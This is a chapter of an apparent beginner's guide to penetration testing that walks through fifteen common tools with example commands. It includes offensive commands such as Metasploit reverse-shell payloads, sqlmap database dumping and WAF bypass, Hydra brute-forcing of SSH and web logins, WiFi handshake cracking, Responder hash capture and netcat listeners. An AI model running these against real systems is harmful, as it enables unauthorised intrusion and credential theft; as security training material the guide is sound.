Skip to content

04 - Essential Tools & Skills πŸ› οΈ

Master these 15 tools and you can hack 90% of everything

🎯 The Truth About Tools

Beginners think: "I need 100+ tools to be a hacker"

Reality: "Master 15 tools and you'll out-hack 90% of people"

This chapter shows you the ONLY tools that matter.

πŸ”₯ Tier 1: Must-Master Tools (Use Daily)

1. Nmap - Network Scanner πŸ—ΊοΈ

What it does: Finds computers and services on networks

Why it's critical: Every hack starts with reconnaissance

Basic Commands:

# Scan a single target
nmap 192.168.1.1

# Scan multiple targets
nmap 192.168.1.1-254

# Scan for specific ports
nmap -p 80,443,22 target.com

# Aggressive scan (fingerprinting)
nmap -A target.com

# Stealth scan (avoid detection)
nmap -sS target.com

Real Example:

nmap -sV -sC scanme.nmap.org

This command finds services and runs default scripts

Master Level: Can scan networks without being detected

2. Burp Suite - Web App Testing πŸ•·οΈ

What it does: Intercepts and modifies web traffic

Why it's critical: 80% of bugs are in web applications

Essential Features: - Proxy: Intercept requests/responses - Spider: Map application structure
- Intruder: Automated attacks - Repeater: Modify and replay requests

Basic Workflow: 1. Set browser proxy to 127.0.0.1:8080 2. Browse target application 3. Intercept requests in Proxy tab 4. Send interesting requests to Repeater 5. Modify parameters to find vulnerabilities

Pro Tip: Use Burp extensions like Logger++, Autorize, ParamMiner

Master Level: Can find complex logic flaws using Burp

3. Metasploit - Exploitation Framework πŸ’₯

What it does: Exploits known vulnerabilities automatically

Why it's critical: Fastest way to get system access

Basic Commands:

# Start Metasploit
msfconsole

# Search for exploits
search ssh

# Use an exploit
use exploit/linux/ssh/ssh_login

# Set target
set RHOSTS 192.168.1.100

# Set payload
set payload linux/x86/shell/reverse_tcp

# Run the exploit
exploit

Common Payloads: - windows/x64/meterpreter/reverse_tcp - Windows reverse shell - linux/x86/shell/reverse_tcp - Linux reverse shell - php/meterpreter/reverse_tcp - Web application shell

Master Level: Can chain exploits for full network compromise

4. Sqlmap - SQL Injection Tool πŸ’‰

What it does: Automatically finds and exploits SQL injection

Why it's critical: SQL injection = instant database access

Basic Usage:

# Test a URL
sqlmap -u "http://target.com/page.php?id=1"

# Use cookies
sqlmap -u "http://target.com/page.php" --cookie="session=abc123"

# Dump database
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Dump tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

# Dump data
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --dump

Pro Settings:

# Full automation
sqlmap -u "URL" --batch --dbs

# Bypass WAF
sqlmap -u "URL" --tamper=space2comment

Master Level: Can bypass advanced WAFs and find blind SQL injection

5. John the Ripper - Password Cracker πŸ”“

What it does: Cracks password hashes

Why it's critical: Passwords are often the weakest link

Basic Usage:

# Crack simple passwords
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Crack with rules (variations)
john --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt

# Brute force (slow but thorough)
john --incremental hashes.txt

Hash Types: - MD5: Fast to crack - SHA1: Slightly slower - bcrypt: Very slow (secure) - NTLM: Windows passwords

Master Level: Can crack complex passwords using custom rules

6. Gobuster - Directory/File Finder πŸ“

What it does: Finds hidden directories and files on websites

Why it's critical: Hidden admin panels = easy wins

Basic Commands:

# Find directories
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Find files with extensions
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

# Find subdomains
gobuster vhost -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Best Wordlists: - /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - /usr/share/wordlists/dirb/common.txt - Custom wordlists for specific technologies

Master Level: Can find hidden endpoints that lead to full compromise

⚑ Tier 2: Important Tools (Use Weekly)

7. Netcat - Swiss Army Knife πŸ”§

What it does: Network communication tool

Why it's useful: Simple file transfers, reverse shells, port scanning

Common Uses:

# Listen for connections
nc -lvp 4444

# Connect to remote host
nc target.com 80

# Transfer files
nc -lvp 1234 > received_file
nc target.com 1234 < file_to_send

# Simple web server
echo "Hello World" | nc -l 8080

8. Nikto - Web Vulnerability Scanner πŸ”

What it does: Scans websites for known vulnerabilities

Basic Usage:

# Basic scan
nikto -h http://target.com

# Save results
nikto -h http://target.com -o results.txt

# Scan specific port
nikto -h http://target.com -p 8080

9. Hydra - Login Brute Forcer 🌊

What it does: Brute force login pages

Common Protocols:

# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com

# Web form brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://target.com

10. Wireshark - Network Analyzer πŸ“‘

What it does: Captures and analyzes network traffic

When to use: Understanding network protocols, finding sensitive data

Basic Filters:

http                    # HTTP traffic only
tcp.port == 80         # Port 80 traffic
ip.addr == 192.168.1.1 # Specific IP

🎯 Tier 3: Specialized Tools (Monthly)

11. Aircrack-ng - WiFi Hacking πŸ“Ά

What it does: Cracks WiFi passwords

Basic Process:

# Put card in monitor mode
airmon-ng start wlan0

# Scan for networks
airodump-ng wlan0mon

# Capture handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Crack password
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

12. Social-Engineer Toolkit (SET) 🎭

What it does: Creates social engineering attacks

Common Attacks: - Credential harvesting - Phishing emails - Malicious payloads

13. Responder - Network Credential Harvester πŸ•ΈοΈ

What it does: Captures network authentication attempts

Basic Usage:

# Start responder
responder -I eth0 -rdwv

# Capture NTLM hashes
# Wait for users to authenticate

14. Empire/Starkiller - Post-Exploitation πŸ‘‘

What it does: Maintains access after initial compromise

Features: - Encrypted communication - Persistence mechanisms - Privilege escalation modules

15. Custom Scripts πŸ“

What they do: Automate repetitive tasks

Essential Scripts: - Reconnaissance automation - Payload generation - Report generation - Notification systems

πŸ’ͺ Essential Skills (More Important Than Tools)

1. Linux Command Line Mastery πŸ’»

Critical Commands:

# File operations
ls, cd, cp, mv, rm, find

# Text processing
grep, awk, sed, cut, sort

# Network
ping, curl, wget, netstat, ss

# System
ps, top, chmod, chown, sudo

Practice Challenge: Navigate entire system using only command line

2. Scripting (Python + Bash) 🐍

Why Essential: Automation separates pros from beginners

Python Basics for Hackers:

import requests
import subprocess
import json
import base64

Bash Automation:

#!/bin/bash
for target in $(cat targets.txt); do
    nmap -sV $target > results/$target.txt
done

3. Web Technologies Understanding 🌐

Must Know: - HTML/CSS/JavaScript basics - HTTP methods (GET, POST, PUT, DELETE) - Cookies and sessions - API structures (REST, GraphQL) - Common frameworks (WordPress, Laravel, Django)

4. Networking Fundamentals πŸ”—

Essential Knowledge: - OSI/TCP model - Common ports (22, 80, 443, 21, 25, 53) - Subnetting basics - DNS resolution process - VPN/Proxy differences

5. Operating Systems πŸ’Ύ

Windows: - Active Directory basics - PowerShell fundamentals - Windows services - Registry structure

Linux: - File permissions - Service management - Log locations - Package management

πŸ”₯ Tool Mastery Roadmap

Week 1-2: Core Tools

βœ… Nmap (all scan types) βœ… Burp Suite (proxy, repeater, intruder) βœ… Basic Linux commands

Week 3-4: Exploitation

βœ… Metasploit (common exploits) βœ… Sqlmap (various injection types) βœ… John the Ripper (different hash types)

Week 5-6: Web Testing

βœ… Gobuster (directory enumeration) βœ… Nikto (vulnerability scanning) βœ… Manual testing techniques

Week 7-8: Advanced

βœ… Custom script creation βœ… Specialized tools for chosen path βœ… Automation workflows

🎯 Daily Practice Routine

Morning (30 minutes)

  • Run nmap scan on practice targets
  • Review scan results
  • Document interesting findings

Lunch (15 minutes)

  • Read security blogs
  • Check new tool releases
  • Review CVE databases

Evening (60 minutes)

  • Hands-on practice with main tools
  • Work on scripting skills
  • Test on intentionally vulnerable apps

🚨 Common Tool Mistakes

❌ Mistake 1: Tool Collecting

Wrong: Download every new tool you see Right: Master core tools first

❌ Mistake 2: No Methodology

Wrong: Random tool usage Right: Systematic approach to testing

❌ Mistake 3: Ignoring Documentation

Wrong: Only learn basic commands Right: Read full documentation

❌ Mistake 4: No Automation

Wrong: Manual repetitive tasks Right: Script everything you do twice

πŸ“š Best Learning Resources

Hands-On Practice:

  • TryHackMe: Best for structured learning
  • HackTheBox: More challenging, real-world scenarios
  • PortSwigger Academy: Web application security
  • VulnHub: Downloadable vulnerable VMs

Tool Documentation:

  • Kali Linux Tools: https://tools.kali.org/
  • OWASP Testing Guide: Methodology and tools
  • Metasploit Unleashed: Free Metasploit course
  • Burp Suite Documentation: Official guides

Video Learning:

  • IppSec (YouTube): HackTheBox walkthroughs
  • John Hammond: Tool demonstrations
  • NetworkChuck: Networking and security
  • David Bombal: Practical cybersecurity

βœ… Tool Mastery Checklist

Beginner Level:

βœ… Can run basic nmap scans βœ… Use Burp Suite proxy βœ… Execute Metasploit exploits βœ… Navigate Linux terminal confidently

Intermediate Level:

βœ… Write custom nmap scripts βœ… Find vulnerabilities with Burp extensions βœ… Chain Metasploit exploits βœ… Create automation scripts

Advanced Level:

βœ… Develop custom tools βœ… Bypass security controls βœ… Automate entire testing workflows βœ… Contribute to open source tools

πŸ”— What's Next?

You now know the essential tools.

Next, let's talk about turning these skills into money.

NEXT: Chapter 5 - Making Money β†’

"Give me six hours to chop down a tree and I will spend the first four sharpening the axe." - Abraham Lincoln

Master your tools. Master your craft.